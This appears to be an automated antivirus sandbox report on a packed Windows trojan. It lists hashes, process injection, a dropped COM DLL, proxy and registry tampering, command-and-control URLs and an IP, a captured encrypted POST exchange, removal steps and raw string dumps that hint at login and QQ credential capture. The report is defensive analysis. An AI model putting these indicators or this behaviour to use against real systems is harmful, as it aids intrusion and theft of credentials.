Gen:Variant.Symmi.57379 (B) (Emsisoft), Gen:Variant.Symmi.57379 (AdAware), Trojan.Win32.FlyStudio.FD, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9a61377f7a267d0733acc68f3f3072cf
SHA1: 5e54992e3afc40333f0ddcf340790d48ad7e349f
SHA256: a4c9fcaad48bb22de6acd412eea7136e979c1c6617836f620fc62dbe2f26e20c
SSDeep: 49152:nGHQYGTwg AM HhgGibN4O9M3uLGgDekt3q wtw9JbtYDvPd3TR47jna/gRkVNOK:Gwt8wM HMvDH xl47za/D4GYEpuSh2e
Size: 4464640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-05-03 21:14:58
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:1780
The Trojan injects its code into the following process(es):
%original file name%.exe:2956
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process regsvr32.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ZCB_API.DLL (49 bytes)
The process %original file name%.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ZCB_API.DLL (1 bytes)
Registry activity
The process regsvr32.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\TypeLib]
"(Default)" = "{D7111ECF-2415-46C6-AAD4-EE6802448456}"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\ProgID]
"(Default)" = "REGCOM.Register.Api.1"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0\0\win32]
"(Default)" = "c:\ZCB_API.DLL"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}]
"(Default)" = "ZCBApiPlug Class"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\TypeLib]
"(Default)" = "{D7111ECF-2415-46C6-AAD4-EE6802448456}"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\TypeLib]
"Version" = "1.0"
[HKCR\REGCOM.Register.Api\CurVer]
"(Default)" = "REGCOM.Register.Api.1"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0]
"(Default)" = "ZCB_APILib"
[HKCR\REGCOM.Register.Api.1\CLSID]
"(Default)" = "{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\VersionIndependentProgID]
"(Default)" = "REGCOM.Register.Api"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\InprocServer32]
"(Default)" = "c:\ZCB_API.DLL"
[HKCR\REGCOM.Register.Api.1]
"(Default)" = "ZCBApiPlug Class"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}]
"(Default)" = "IZCBApiPlug"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\REGCOM.Register.Api]
"(Default)" = "ZCBApiPlug Class"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0\HELPDIR]
"(Default)" = "c:"
The process %original file name%.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASMANCS]
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
7925a1237adddf061c1ec4f9c0328597 | c:\ZCB_API.DLL |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:1780
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\ZCB_API.DLL (49 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: ??
Product Name: ????
Product Version: 1.0.0.0
Legal Copyright: ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ????
Comments: ????
Language: Spanish (Spain, International Sort)
Company Name: ??Product Name: ????Product Version: 1.0.0.0Legal Copyright: ????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ????Comments: ????Language: Spanish (Spain, International Sort)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 999258 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1003520 | 3745736 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 4751360 | 390730 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 5144576 | 85500 | 73728 | 1.14454 | 753f0c704956f034c5f6437deb7c865e |
.vmp0 | 5230592 | 115152 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 5349376 | 4381495 | 4382720 | 5.44642 | dcca07c29627637961a1f0efd028fbab |
.reloc | 9732096 | 52 | 4096 | 0.072668 | 3f22af9f5bc29be1d803560f5fb2037c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://jdyou_152.proxy.kaopuyun.net/Open/V1_4/Soft/Upgrade | |
hxxp://c.84zcb.com/Open/V1_4/Soft/Upgrade | 125.77.22.178 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /Open/V1_4/Soft/Upgrade HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: c.84zcb.com
Content-Length: 363
Cache-Control: no-cache
data=ZU/VMNyNxS1TnWRRj8GxQjWrbubxbK0I3z4lBE3kH1Lg0zx7Bm8NCL6F1dhzPiI3pLtLGO3rCd5V2DtXaBJo5sQ6HXo6eUWWiW cegStVRiwjeUVmrzou8S4yae3VVvMiUu3yRbPIdm1Ku8RJziEez//9TTQ5zmKRmAQQgmBI8iszeFbtvy4qONM0LFZeinZJbQVvlnxqWvlgwJYnCm/N6Mr3CVSYek/6osDNktRBY89J8tH7/VZBVvfiXpVcKfg5u JZAowUxbhQkiEuHHkjrmK5o/1Iw6ZVwBN8X0r1cBiBaWdZU/VMHEdcEWdhtEF&sign=9C296E0C2193E917A57032C94E3E6593
HTTP/1.1 200 OK
Date: Wed, 07 Dec 2016 22:25:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 728
Connection: keep-alive
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: no-cache
pmFeIO9K3DilnoBmWvXyvfWSsM8ondhCagHPiKq3tzTSPR2dpWuZt3QAv3xy5QaD/p/saU4FM/nw8fIj0NVbcHHoZCA 5udmJ2SGitbb X5iiUpsjgcPXlASfhFZspBi5ZijI3RujBRhfho3u6DP7F xhWh bYpWf2VPSTS8Yk8ZHtRH9vb8OG5N4B osfVMrnJRBdXJrJkqb1d//fNtodbm6Fujpth0JpuF1lzvGytVKRBDtaBvhQHGVmI2uDP4YlO BRvxfYWDr47imgN1Vuq/74SuMNnB6CsXdQ3qGxIyhyKB4NBKDhho8SqgC3jHO/MJ9bZ9W8ZkcTFOTYiiOZhEQJJe1mp5z3Q4sC2qiPqBDVEI1Z/aU61FZHHAjcCEmuPMy 1BDcNZPSzmAbYOg7Ux9i3F dBgFW8v2L7kbrFyvtpLnVCVUhf1RiJDXjnpubue4eYV6uvWHtG2jXazhrrNuvyMf8FbEniFM20cmwpdo3aUJd/tEcVYwd1mQ6HV8WQAM3tsCyF1TdrwXTcjeU65vLzByfGMnf2m3PiJmvJrdtLx2OJ/Kllf2mzd03zJP6dG1yHpMzg0ewdx6MK6h4Pu3gySTPNpiBhV0MMMKhB5xnz4h0fH/jW1GdfmdCsuqleWAzMYH5bw1YU8pm4o8ZFKg3zuYPJm3B/LANr4wK30hARWS/QOUq3bLXoAL24TQto8H6ZhXiAoip7rXVJYiw==HTTP/1.1 200 OK..Date: Wed, 07 Dec 2016 22:25:26 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 728..Connection: keep-alive..Cache-Control: private..Server: Microsoft-IIS/7.5..X-AspNetMvc-Version: 4.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Cache-Control: no-cache..pmFeIO9K3DilnoBmWvXyvfWSsM8ondhCagHPiKq3tzTSPR2dpWuZt3QAv3xy5QaD/p/saU4FM/nw8fIj0NVbcHHoZCA 5udmJ2SGitbb X5iiUpsjgcPXlASfhFZspBi5ZijI3RujBRhfho3u6DP7F xhWh bYpWf2VPSTS8Yk8ZHtRH9vb..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_2956:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.vmp0
@.vmp0
`.vmp1
`.vmp1
.reloc
.reloc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
Bv.SCv=kAv
Bv.SCv=kAv
gdiplus.dll
gdiplus.dll
GdiPlus.dll
GdiPlus.dll
user32.dll
user32.dll
kernel32.dll
kernel32.dll
Kernel32.dll
Kernel32.dll
advapi32.dll
advapi32.dll
Ole32.dll
Ole32.dll
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
Gdi32.dll
Gdi32.dll
msimg32.dll
msimg32.dll
User32.dll
User32.dll
Gdiplus.dll
Gdiplus.dll
UxTheme.dll
UxTheme.dll
GetKeyState
GetKeyState
GdipSetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
UnloadKeyboardLayout
UnloadKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
ActivateKeyboardLayout
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameA
RegOpenKeyA
RegOpenKeyA
RegDeleteKeyA
RegDeleteKeyA
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
RegFlushKey
RegFlushKey
LoadKeyboardLayoutA
LoadKeyboardLayoutA
UnregisterHotKey
UnregisterHotKey
RegisterHotKey
RegisterHotKey
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
10/05/12
10/05/12
\.YVV
\.YVV
Ã[H
Ã[H
L
z>REGCOM.Register.api.1
.UPX0
.UPX1
@.rsrc
GDI32.dll
%c,UJ
SHELL32.dll
IPHLPAPI.DLL
COMDLG32.dll
USER32.dll
%.Dyy
>#>0>=>~>
: ;%;3;8;\;
?!?%?)?-?1?
5#5'5 5/53575
3 3$3(3,3034383
9 9$9(9,90949895 5$5(5,505667[7~7 86282`3@4}4ZCB_API.dllY3%f{!.Ke%SchXa.ZktG6C.Ceu}J1.RvV.av^SvCL.HC*VsqLd%sKC%%CI7'~V%y.gUeA3F|EJc%XaN%xu'&*"8{@>['?.Wo].Mjq@1.cKyr-W`AnV.XC^r.wp8%x]5.koDIgf%UT%Gr%DlCÂ1=5}%sp7.FX-.ZkE6C.gm,.DFnoyP/.Wllr.SB%Ub).nhbwMSG.oVMOG.zzg%S Khn.RPX]g#M.yVE.IaUC.yx4mo.lS=F)h>X.NM9pn.FPH3.Ye>.ynD&.nTTVG#3.wiEP8j%CZd.Jn.Te>9.kWkd`.Cc|O.xmOZh.YW&F.paglD&.MY]Hpu%UGq.zE-q}?!.KUh|@q%c*v$2.ZM..SK1Y}.Mc%0s./2.fx4sms0%c0.Td'.nK2.HJ\;a%D-l.eos08H.Mf^1.uprVa|Cq%uIA0Q!.Re%.pYh:\Fq.OW`p`*.Dhe.mh"~I.bfÖo5L.De;>{X%F&$Z.b8H.ZB~@>P iXB%sJ2%Cu"~RUrlt c=@|G.ZTw;%x5.q.rgXj`(W.WVvmX.Iz7H.OD=K.yyoledlg.dllKERNEL32.dllHttpOpenRequestAOLEACC.dllWININET.dllVERSION.dllVJ.wA EShellExecuteWSHLWAPI.dllOLEAUT32.dlle*%C$2S".avWINSPOOL.DRV.QCRzwH%C^,,.iImuRLW8405.Do#-Z}Vmv.MK]MiA.cD%7u3mjW%x=uLsaIc\.pAO4Ll%SiS.Ac[F.qg.oodJ'.KrTI%s=!d.Hz).mp{v.jc&k?.ee?!ADVAPI32.dll*a.DMj%FK.dnREGCOM.Register.Api.1 = s 'ZCBApiPlug Class'CLSID = s '{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}'REGCOM.Register.Api = s 'ZCBApiPlug Class'CurVer = s 'REGCOM.Register.Api.1'ForceRemove {9CF66319-AA2F-424A-BEEA-9E42E36BEA1A} = s 'ZCBApiPlug Class'ProgID = s 'REGCOM.Register.Api.1'VersionIndependentProgID = s 'REGCOM.Register.Api'TypeLib = s '{D7111ECF-2415-46C6-AAD4-EE6802448456}'stdole2.tlbWWWAPI_LoginWWW,7API_FindPassworddAPI_LoginOutdAPI_QQLoginWCreated by MIDL version 7.00.0555 at Fri Mar 13 14:58:24 2015Adobe Photoshop CS4 Windows2012:08:09 14:06:56urlTEXTMsgeTEXThXXp://ns.adobe.com/xap/1.0/" id="W5M0MpCehiHzreSzNTczkc9d"?>
%dYJH'
le~.leU
S%SKz
>{%UQ
,%f.F
F.ijA
}%UT0B
M%D(a
%.bx&
{O1%D
zuI{ %U
lO.mUY
d%u%4SIow=%dos~Iw%ftj.zQi?.sG4]Zu.rz;U&S%xg!ECE_[ò$"D)DeXETN.WR5f.jy=n.Te%SY>Vo&<.nzq>z:\DRM7-x}W^\}.Ordz.Nh=ix-x}WG.WxK'.IDATx%cri\:O .ZlhXXp://f.hiphotos.baidu.com/album/s=740;q=90/sign=69bde5a33a292df593c3ae118c0a2d5d/4bed2e738bd4b31c7a52b43787d6277f9f2ff8d4.jpghXXp://b.hiphotos.baidu.com/album/s=740;q=90/sign=be24b17e7d1ed21b7dc92ce19d55acf9/eaf81a4c510fd9f9ee9a75e5252dd42a2934a4a8.jpghXXp://f.hiphotos.baidu.com/album/s=740;q=90/sign=f34523c6dab44aed5d4ebce08327f63c/8435e5dde71190ef039bb253ce1b9d16fcfa60dd.jpghXXp://f.hiphotos.baidu.com/album/s=740;q=90/sign=5fa5abb56b63f624185d3b07b77f9ac5/71cf3bc79f3df8dc7cbaaf1dcd11728b461028b2.jpghXXp://e.hiphotos.baidu.com/album/s=740;q=90/sign=94c20c64bc3eb13540c7b5bf9625d9ee/f3d3572c11dfa9ec9edb769b62d0f703908fc140.jpghXXp://f.hiphotos.baidu.com/album/s=740;q=90/sign=dc4d926a277f9e2f74351f0c2f0b9819/fcfaaf51f3deb48ff1928152f01f3a292cf57846.jpghXXp://e.hiphotos.baidu.com/album/s=740;q=90/sign=c80984f9d688d43ff4a993f64d25a326/f7246b600c338744dff20cf0510fd9f9d72aa002.jpghXXp://h.hiphotos.baidu.com/album/s=740;q=90/sign=d2fbf6429925bc312f5d039c6ee4fc8c/b21c8701a18b87d6d8718893070828381f30fd0f.jpg9g.gq;P.pS''#g Wv.NxyJ/TU9^)%d\Config.ini@qq.comexplorer.exeDFO.exeAPI_LoginOut\Qsdfdg.ime\Qsdfdg.dllNeopleLauncher.exe`.vmp2..jf.IMM32.dllh.ekc-&M.mhGetCPInfoImeProcessKeyimehost.dllVP%f#lEEnumThreadWindowsOffsetViewportOrgExSetViewportOrgExCreateDialogIndirectParamA233.dllWINMM.dllShellExecuteAiCrTt!u!"MSIMG32.dllcomdlg32.dllRegCreateKeyExAUnhookWindowsHookExGetViewportExtExlfY%D.Qlf%)2%2,222%soGdj4%F$I202?262>RegOpenKeyExASetWindowsHookExACOMCTL32.dllGetProcessHeapWS2_32.dll."8fTP:%cs/4{/BNË[@5ML.wCr5L}.PA9.kF;O43o.hA/%x 4p%[%u&:.Cfpf%sRs{b<.bx>'%ud@$lV.Tu$;CZx#.LUZ`'.yl.ru?~\J.RC]'.krC.Rk!]5 >82z%cnu&T@.Qc-j{gr%S.CNC_%xEhl#g!Ü%cOl^-8}#yGetViewportOrgEx*a%f&Cs-,.eHI`y.4A.zf}TGh?%f#q.fx}81&YH.Zg5bJY.Zl%$CP{Zx%d%MUF%x3|5$%sXN%x.(17be}%D/4%c@El"D3J9%xiÔ3A>3#{$'5,Ej}%C2$-K}-=,%cu%f?/&%U3;.Y %D,L%DwYO!.CDI}K.VDS.TD3>&1.gsd\D0|.NitUbg%DRN}X%DP.Dn'.qDL4ifvU.ObNHDa.xi.Iw^.]DFZ#2.Vdvu.VD/u.UG(0{$@-.>.?.RT=*%u|uYuWu():3[>[$.NT7-%suQT7>"3975]4.sR)L%CH.>~x~.DWh2ÛQkC %U4$`c%XQT=.Qyu;DvM$%F.%DkVz"nZ^%D%uoa:$c%5Uv,.DBiw?.sjHr.CDc:/%u7(UDP L%FqDg`>udPlQ.cDEjMw.DmD.Jmom4E.Jc(;%u|*eD;3 A91)D?7/'=5-%DDOWQYC =%Dm_1#&.Cu%"=t%D}3dEnumChildWindowsScaleViewportExtExSetViewportExtExWinExecGetWindowsDirectoryAQsdfdg.dll2@{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}09/27/12Windowsimm32.dllKeyboard LayoutKeyboard Layout\Preload.comment {color:green}%d&&'12345678900003333deflate 1.1.3 Copyright 1995-1998 Jean-loup Gaillyinflate 1.1.3 Copyright 1995-1998 Mark AdlerF%D,3%*.*fCNotSupportedExceptioncommctrl_DragListMsgAfx:%x:%x:%x:%x:%xAfx:%x:%xCOMCTL32.DLLCCmdTargetMSWHEEL_ROLLMSG__MSVCRT_HEAP_SELECTBroken pipeInappropriate I/O control operationOperation not permittedTiphlpapi.dllMPR.dlli1p.vqWSOCK32.dll.PAVCException@@Shell32.dllMpr.dllAdvapi32.dll(&07-034/)7 '?? / %d]%d / %d].PAVCFileException@@: %d](*.*)|*.*||(*.WAV;*.MID)|*.WAV;*.MID|WAV(*.WAV)|*.WAV|MIDI(*.MID)|*.MID|(*.txt)|*.txt|(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG(*.JPG)|*.JPG|PNG(*.PNG)|*.PNG|BMP(*.BMP)|*.BMP|GIF(*.GIF)|*.GIF|(*.ICO)|*.ICO|(*.CUR)|*.CUR|%s:%dwindows.PAVCNotSupportedException@@out.prn(*.prn)|*.prn|%d.%d%d/%d1.6.9unsupported zlib versionpng_read_image: unsupported transformation%d / %dBogus message code %dlibpng error: %slibpng warning: %s1.1.3bad keywordlibpng does not support gamma background rgb_to_grayPalette is NULL in indexed image(%d-%d):%ld%cUSER32.DLLhXXp://VVV.baidu.comMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)HTTP/1.0%sReply-To: %sFrom: %sTo: %sSubject: %sDate: %sCc: %s%a, %d %b %Y %H:%M:%SSMTPY%dX%dHeight%dWidth%dRECT(%d, %d)-(%d, %d)Styles0xXControl ID%dHandle0xX
%s |
burlywood
\winhlp32.exe
(*.htm;*.html)|*.htm;*.html
%d%d%d
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÃ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
N.Jxd
*.JxbF
InternetCrackUrlA
u$B79%C
=.nCPgb
a.GTYOE
I%sbBW
msGT
pT.LZ
.DT-u
{QqÑT
YV-B}T
^x.WXZ
.7.:.%.0.
m.HS@E^
'.EXB
L\~.XT$
T.bthC
T$\%X
'G_
C.hNSM
MSX
7)'
K.qR\
$.TL(
.QkgM
Fp.Tq
%SrCT
.TUn:
}X.TWt
:'_.cT
^sn2.aD
%U1l >T
$r.lO
S7%fTX
v.uGT
4Tg-L}c
Â[ T
FTpGs?(
.iTsOE
4h1%U
.AT1o
;%F?h
.Tp8r
RTeq _%U~>Y
(w]%.FNT4
eJ.TI@
%xT4)
/.Te1L
/V.QG
s.SsIW_u
c;T%X
W:\6sun2
Gl%DxB
XTWÅ“
m@.zd
r@D-n}
cRT`@
.Qz5DS
V.RE/
.kTSn
{&.FT
`~/T}þ
T.hyszl
Nl_%uTW~1
.Tu[8
%xT4Rv
^7.VT
i*T%S.6
j)u.Tnb6
.jT[hwIka
$D%UV
wC~.TL=
.EWQ9y
YcRT
Q.wQ-V}$Tn4.TD@io0sN.oT0xZ.SW.STUG@esh.Tz3T.XB.Ts\~kTY%xmJ=.Te.TLg:evK%ST*_%Fj}wd.gT'z,j.vQf%STHx.Sp-.srT:%FTP?j(g.No2q.TD.RC80v,%DTbX?.Lom'.gXc3k.yGTm.TuYU%0XT-$tCP/v~!.20%U=H%C=ZWT.SAB.cTj%6UB(PT.FUf^".TEZ=.ry$%XO]{.ac/AJ.OmxT@A.RYv.ZjTeGFTPbD3.VTg.ZTxPN%UC%D},ddZ.NT.TL4&OOQ%u0.TdnB@$VT%X%Ud_qmyaT~.Lx.ET.bZ|.TA*X2.PAL.WRhI>Cú.RwqnHJ(n.NT5-#%XfU1(z%xN.Thp*I>k.Thc.vVTc6J.pQ\Tv.tr|j.UWLC[.TOHG 7%C.GKT~)~.csvT/Q@.pV)!T@#r3TÞN.DTUKt_%D.vW]SB.PT`%.TOLn{].qTX&6.pU}57.3T%F.BbT(^.mXulFY/.Cd^"$.ej{%uTIsO.cj}TZ&M%s4yP.WkB;b].XTY%XW'O.PkUA.bS\yT7.dctYTSqL[.BTAk.vb{~T;A%dlQ.mx>(T.AvQr.xT"(s4.oTD4.WT%FhfrT8.yT[]p.fU5.Ts&9T.hL4^N$.zXPTe.rw=%DTY5/U.Ke7.kYv.Tj'>.TrC:v.RTns:bx.jT;A.wrD^.uT9Qod.TRYk.yc7.TY9TL.bVq.Wn\#oC.TwU^.RVTO-5W}%sW{ZT.qaE%T,sTw%xBS.LT,.yY]k.TSt_s.TAk0pT%s4.rYd;*T %dT.YkI,pV_W.ZX*az.aMcv2.NGc.Tk*`>W.wT.XrT%ACrT?^`exE3Ou %chyT|X.gn.VIlT}T!.Bj'.UPS;7w.pC.wT)Df.Rvb"p.PT>;T%xC`}BTKx.LZWh.tGV.wxY&jÂWso.iYtpzUT.ko[w%x".lu:T!Q.vFbtU.zUg'cu.hTwEÅ!JV.Tlot=U%S.wt(hO.JTqR>Ep'~%.vqJqU.qI@.wYQYsTP%8UCrtkA-d}T^%xmzüQ 4(%uTo>TXZi.OR[-v}4Ufc.XTsT b%U>.Iq$7T%f bk%sTwrTscRTd,F&.TUHQ;%XT%qv.MTq.%Sr7yTH.bIWW_dY0*tE.Tu%c Vc($0<.hu>xQ.IVm.se:t]U.UYS3H.raY4.qVb/m.qx-.naj,.eb4sVjU.Sn.TSi3E%C=TWQ%C/.yYk.KEY!hn%.Sp.iT::IbinTCp.TS{P*a|%d_S*-CT}aYg.OqAHFtP4J[v-Ta}ST.pZD~^%Sq%CU0S`mQ05%xhd.dOoO{T%F0/X6.LTNO7.LTk-T}BOkQT.qKSi%xWI.qx_%f}TR.orz_i>T%ua_.gZ$f.UeUP.eTuI[.kTZ.qk_P'E.StFAFeXEWB%sT6~C.LxB.nT1*?.uT34(.sT*.ZT;~1I!.UA'%UI f)7.qt!'".XI1h%U1t.oTQ0T.Oe.swDMm].Gk=.UU#lWe$%fn_.BU}5v.RT30`.NPOq:SQlfp.vI4/$.jXj.EtNT0(%F[]3t.ATa(;g{O%STC
SC
%0S[{
ZTA.UF
.OT'n
}.BeT
.xQ,4N
.qT:9{
=X;%f
i".WT
b}'"u.QT
Klk.TY5EV
F.WZ=
0aN-6}7
l.AT[
jWy%U
m|T.GM
T.Wþ
.ld:jT
.jThJ9
M0.tT
n.kTNjh
5.vRz
%4upU
H8N1.TQ
(PV.WsE
nZ.Td~
4`.TA:
%uT5(
JzT2%s
vT.gl
WMWn3-h}~
%dvWirQ
V.kUW
%DQNS
#-i.dQtCf
%UH[xs
1.pP]g
%jQ.MaS
5ý\M
t.ZT}EK5
%0XTJA{5>[
.vTeJw
).YH&s
,0.tQb
f.XT;
J2.yTHg"
Tku".XI
6.TeN
S.xoX@Twm
".YTa
qzc.oW=
.bsTmWlO5%JxT
IT.Xu$3
,.Trq
4.jTa
%sY8TQ
\.YIo
3HWc.uy
-AT}x
D.cU1
A.ULVWD
tT.kb
bUDP
UdpZ
^.uTy
To.ME
2G-e}
g.pT2
jIqXw%sT
.pnFT6&
5.QTh
42]%CT
%CZ(e
Te_%S
f.YTR5
?.kH]
FTpKu
rM/%C
|.Tw.YTAP)j.MT/Ijr.NhTT.zuP{o.TMg@c&.Xny$WD.iTWfTPE.GUW\.Ty-FMdGw.jrT;c.WEW*K.iT~`;%Ub%XqoAW-.dP2%U}zj.ETyqI1/).BT;U.qy\.iWhy!(4'U%uW"^j>.PT2ot9wNv.gPT-v}vYk.UE{PP.YUT`q;1U.mja?05i.GT..TF$IsQL.xezGlCRTp5%xT(.vS ]6T.Yk\l.eBqQ;%Xhql`Tv-S%Xpmx.iT@wo.Uk{;%XyX{AT-n}Xr.UTT.ZlhV.Ty!.qTxgi;%UWg.VW3/jf%p.txe3WT.pTDAQ$[%Uj.Qa7zV.WoZ06l$FTpHMSgTDHT.IBJWxs%FwWmSg_kSw.eT,|xQ!%xT5`5.wXOY~^.YjS%sfq%dXrm8u.vT'qp!h.Tdu{fw/.TQ@%xT3jRT.Fzv.PVANe.hLT.mzTc/.TUB^p%U~QMK.WZ|gN.mTMea%x~?;TTs%fTL.Wr!~q.dOhTB%sRb4zU.KL%PrcH%X.pHT9.OxbF$IxF$.iT8PjK.zp.TZt!H"z.TxV.XrU%b$.iU'FTpU#T%Fs8JeRT%Xt> r%xK/.TVST-m}].S.Tvo;h%XT!mC%XS9%Xg:3.Ts[;^Po.eTTi%SdwT\.LW5H%x|bv8.Tvq-H}{.jsoe&p%sT`!}.rkfV.CbHL0.TxHL0u.UU4*XSQluN-'8(@{?$uNRuN$uN.uNO 